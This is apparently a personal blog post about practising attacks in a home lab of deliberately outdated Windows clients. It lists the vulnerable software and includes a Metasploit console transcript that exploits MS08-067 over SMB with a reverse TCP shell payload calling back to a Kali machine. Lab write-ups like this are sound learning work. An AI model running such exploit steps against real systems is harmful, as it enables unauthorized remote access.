So to get some practice I’ve built a lab of obscenely vulnerable Windows client machines. While this doesn’t really represent any kind of real world situation it’s been a good place for me to play around and test things while actually seeing some results. Though it does kind of feel like clubbing a baby seal at times.
- XP SP3 or unpatched 7.
- Adobe Reader 8.0
- Adobe Air 188.8.131.52
- Adobe Flash 184.108.40.206
- Chrome 22.0.1229.0
- Firefox 17.0
- Java JRE 7 update 2
- Realplayer 220.127.116.11
- Shockwave 18.104.22.1681
The process goes like this. Install OS, join domain, install all the software, configure the profile, snapshot the VM, ready for use!
The first tests I’ve been doing have all been MITM based browser attacks, but today I felt like being a bit more direct.
I initially tried using exploit/windows/dcerpc/ms03_026_dcom. The first run indicated the port wasn’t open. Which made sense because I never opened that port on the target. So I created a file share to “prime the pump”. Still no dice.
Next up was exploit/windows/smb/ms08_067_netapi. This one worked, and I got a shell. I’m documenting the actual text below so I have it for later.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100 (target)
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.50 (Kali)
msf exploit(ms08_067_netapi) > exploit
meterpreter > (Success!)
I’ll probably mess around more later today.